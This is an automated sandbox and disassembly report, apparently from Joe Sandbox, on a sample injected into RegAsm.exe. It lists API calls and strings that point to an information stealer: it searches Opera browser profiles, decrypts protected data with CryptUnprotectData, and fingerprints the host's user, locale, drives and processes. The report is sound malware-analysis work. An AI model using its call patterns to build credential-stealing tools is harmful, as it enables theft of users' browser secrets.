Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFind$FirstNextwsprintf
String ID: %s\%s
API String ID: 111849568-4073750446
Opcode ID: 072cdcf92336228de56ae1516b8a9c8fc56147d7ea042199880caf657913251d
Instruction ID: 32a1530b6f6b3f971f2372f18af5ada9a00b89577cc7e7e1cca20f8dd29428d7
Opcode Fuzzy Hash: 072cdcf92336228de56ae1516b8a9c8fc56147d7ea042199880caf657913251d
Instruction Fuzzy Hash: 7B51E4B1800218ABCB10EBA0CC45BEE777DBF09704F40459EFB05A3181DB789B88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1B0 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 664fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,00000000,00000000,?,\*.*,?,?,00427ACE,00000000,?,00000005), ref: 0040B242
StrCmpCA.SHLWAPI(?,00427D0C), ref: 0040B2CC
StrCmpCA.SHLWAPI(?,00427D10), ref: 0040B2E6
StrCmpCA.SHLWAPI(00000000,Opera,00427ADB,00427ADA,00427AD7,00427AD6,00427AD3,00427AD2,00427ACF), ref: 0040B37B
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040B393
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040B3AB

Strings

\*.*, xrefs: 0040B1F9
Opera, xrefs: 0040B36A
;, xrefs: 0040BB28
Opera Crypto, xrefs: 0040B39D
Opera GX, xrefs: 0040B385

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: ;$Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1922906172
Opcode ID: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction ID: 9690fecaf8c131b8b47e39c0c5a29481523bcde2650c36add3c71b8764175778
Opcode Fuzzy Hash: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction Fuzzy Hash: 0F524E30915248EACB15EBA5C955BDDBBB45F19304F5040BEE905B32C2EF781B4CCBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401200 Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 810fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00424344,?,004020E0,?,00424340,?,00000000,00000000,?,00000000), ref: 00401466
StrCmpCA.SHLWAPI(?,00424348), ref: 004014EC
StrCmpCA.SHLWAPI(?,0042434C), ref: 00401506

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

\*.*, xrefs: 00401362
&, xrefs: 00401D81
@6, xrefs: 00401951, 00401954

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirstFolderPathlstrcat
String ID: &$\*.*$ @6
API String ID: 2051144152-2842159198
Opcode ID: 2a697e87ca50838bebfaef3de145184342a7f269887f1d42eb97d1178b5c56e6
Instruction ID: 44408c539f998d041f733f93c1a77994a807b49ce5d211e6c2eeeb93df41b793
Opcode Fuzzy Hash: 2a697e87ca50838bebfaef3de145184342a7f269887f1d42eb97d1178b5c56e6
Instruction Fuzzy Hash: 0A725D70811288EACB15E7A5C955BDDBBB85F29308F5440AEE905732C2DF781B4CCB7A

Uniqueness

Uniqueness Score: -1.00%

Function 19A74CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 19A74EE1

Strings

psow, xrefs: 19A751F5
exclusive, xrefs: 19A74E81
delayed %dms for lock/sharing conflict at line %d, xrefs: 19A74FB5
winOpen, xrefs: 19A75110

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 1fbc0508c7586707a0e025c85c352cd627fdd628381c4750f693eee3c6d84e73
Instruction ID: ee2fbd89e8551dceb2a6eedec01add74ca9261c54e36ade3319fa265c4857f60
Opcode Fuzzy Hash: 1fbc0508c7586707a0e025c85c352cd627fdd628381c4750f693eee3c6d84e73
Instruction Fuzzy Hash: C8F1EF71A043A08FD7188F34C88671B77E9BB44F15F485969F98AC7295E732D849CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00416BB0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 180stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416C29
memset.MSVCRT ref: 00416C4E
GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00416C57
lstrcpy.KERNEL32(?,00000000), ref: 00416C76
lstrcpy.KERNEL32(?,00000000), ref: 00416C94
lstrcpy.KERNEL32(?,00000000), ref: 00416CB7
lstrlen.KERNEL32(00000000), ref: 00416D21

Strings

*%DRIVE_REMOVABLE%*, xrefs: 00416BFA
*%DRIVE_FIXED%*, xrefs: 00416BD4
%DRIVE_REMOVABLE%, xrefs: 00416C7D
%DRIVE_FIXED%, xrefs: 00416C9B

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 1884655365-147700698
Opcode ID: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction ID: fe13885b78f3290ecd7d39ef56567dba2d5f472473329e8ca487ae6efe04297a
Opcode Fuzzy Hash: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction Fuzzy Hash: 74619071600244ABDB31EF61CC45FEE7769EF05704F60412EBA1967182DF7C6A88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004103D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction ID: 32467d17135c4381fdee801ccc49f121a9f7beaa17eb491a29c7cc63036ba799
Opcode Fuzzy Hash: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction Fuzzy Hash: 89319371900119EBCB10DFD5DC85BEEB7B9FB08704F50406EF209A3281DBB85A84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
HeapAlloc.KERNEL32(00000000), ref: 00410378
GetTimeZoneInformation.KERNEL32(?), ref: 00410387
wsprintfA.USER32 ref: 004103B2

Strings

wwww, xrefs: 00410398

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 362916592-671953474
Opcode ID: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction ID: 44720081d5bfcf4de0b039264fe6252f71ebe3c074e5847fe516a4db065da787
Opcode Fuzzy Hash: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction Fuzzy Hash: D4F02774B00214ABD72C6B689C1EFAE7B1E8B82211F444355FE06CB2C0EAB00C1486D5

Uniqueness

Uniqueness Score: -1.00%

Function 00410B00 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Process32Next.KERNEL32(00000000,00000128), ref: 00410B71

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
CloseHandle.KERNEL32(00000000), ref: 00410BE9

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 562399079-0
Opcode ID: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction ID: 6e6253c0bc7aca0069297d9a5e7774d33834fdaa728087442e1970efbb29e10a
Opcode Fuzzy Hash: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction Fuzzy Hash: BA21A271A00118EBCB10DFE5DC44BEEB7BCBB49B14F50416EF505A3281DBB85A498B64

Uniqueness

Uniqueness Score: -1.00%

Function 00411C50 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C89
Process32First.KERNEL32(00000000,00000128), ref: 00411C99
Process32Next.KERNEL32(00000000,00000128), ref: 00411CAB
StrCmpCA.SHLWAPI(?,?), ref: 00411CC0
CloseHandle.KERNEL32(00000000), ref: 00411CE2

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction ID: 08e3f1599d3a10f929bed3b41f19ba99720e1616bff5518888d5ac45308be21b
Opcode Fuzzy Hash: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction Fuzzy Hash: CD11BF76A01518ABC721CF89DC44BDEFBB9FB86710F204296FA05D3250D7345A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00410449 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
String ID: /
API String ID: 3280604673-4001269591
Opcode ID: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction ID: 18608df84cbcd0239a302a1ab97b581227ab4f7f43221c1533691961591ac6d2
Opcode Fuzzy Hash: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction Fuzzy Hash: 53116031A00119EACB14DBD4D885BFDB7B9BF18304F1400AEF609B3182DBB85AC4CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406F90 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
LocalFree.KERNEL32(?), ref: 00406FEE

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction ID: 09355a3e94bf7739add38d711f9a133fcae8b2d8c69785aff26ce7a8339e2a5e
Opcode Fuzzy Hash: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction Fuzzy Hash: 3B01E17960020AAFDB14DFA9DC55FAE77B9EF88B00F104559FA05AB380D675ED00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410280 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 0041028C
HeapAlloc.KERNEL32(00000000,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 00410293
GetUserNameA.ADVAPI32(00000000,012B2DE0), ref: 004102A7

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction ID: 9804d81a03a056e57ee932ac7c1dbb4061c4f1b1a4941ccfe0fe277252d65891
Opcode Fuzzy Hash: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction Fuzzy Hash: EED012B5541219BBD7109BD49C4DADB7BADDB0A751F501192FB05D3240D5F0590087E1

Uniqueness

Uniqueness Score: -1.00%

Function 004105A0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004105AD
wsprintfA.USER32 ref: 004105C3

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction ID: 02812af920acb22cdc7078cfa6f9a81c02f6a6398f02c401a58ac9223811f8c5
Opcode Fuzzy Hash: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction Fuzzy Hash: 81D0C2B980010C97C710DB90EC859E9B3BCAB04200F404295EF04A3180E7756A1DCAE5

Uniqueness

Uniqueness Score: -1.00%

Function 00418CB0 Relevance: 207.2, APIs: 114, Strings: 4, Instructions: 691
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,012B2D00), ref: 00418CC5
GetProcAddress.KERNEL32(74DD0000,012B2D20), ref: 00418CDD
GetProcAddress.KERNEL32(74DD0000,012BDE58), ref: 00418CF6
GetProcAddress.KERNEL32(74DD0000,012BDFC0), ref: 00418D0E
GetProcAddress.KERNEL32(74DD0000,012BDE88), ref: 00418D26
GetProcAddress.KERNEL32(74DD0000,012BDFF0), ref: 00418D3F
GetProcAddress.KERNEL32(74DD0000,012B4048), ref: 00418D57
GetProcAddress.KERNEL32(74DD0000,012BDED0), ref: 00418D6F
GetProcAddress.KERNEL32(74DD0000,012BDD08), ref: 00418D88
GetProcAddress.KERNEL32(74DD0000,012BDF00), ref: 00418DA0
GetProcAddress.KERNEL32(74DD0000,012BDF18), ref: 00418DB8
GetProcAddress.KERNEL32(74DD0000,012B2D40), ref: 00418DD1
GetProcAddress.KERNEL32(74DD0000,012B2980), ref: 00418DE9
GetProcAddress.KERNEL32(74DD0000,012B2760), ref: 00418E01
GetProcAddress.KERNEL32(74DD0000,012B26C0), ref: 00418E1A
GetProcAddress.KERNEL32(74DD0000,012BDF60), ref: 00418E32
GetProcAddress.KERNEL32(74DD0000,012BDD20), ref: 00418E4A
GetProcAddress.KERNEL32(74DD0000,012B3E18), ref: 00418E63
GetProcAddress.KERNEL32(74DD0000,012B26A0), ref: 00418E7B
GetProcAddress.KERNEL32(74DD0000,012BDD38), ref: 00418E93
GetProcAddress.KERNEL32(74DD0000,012BDD50), ref: 00418EAC
GetProcAddress.KERNEL32(74DD0000,012BDD68), ref: 00418EC4
GetProcAddress.KERNEL32(74DD0000,012BE008), ref: 00418EDC
GetProcAddress.KERNEL32(74DD0000,012B2620), ref: 00418EF5
GetProcAddress.KERNEL32(74DD0000,012BE020), ref: 00418F0D
GetProcAddress.KERNEL32(74DD0000,012BE098), ref: 00418F25
GetProcAddress.KERNEL32(74DD0000,012BE080), ref: 00418F3E
GetProcAddress.KERNEL32(74DD0000,012BE0B0), ref: 00418F56
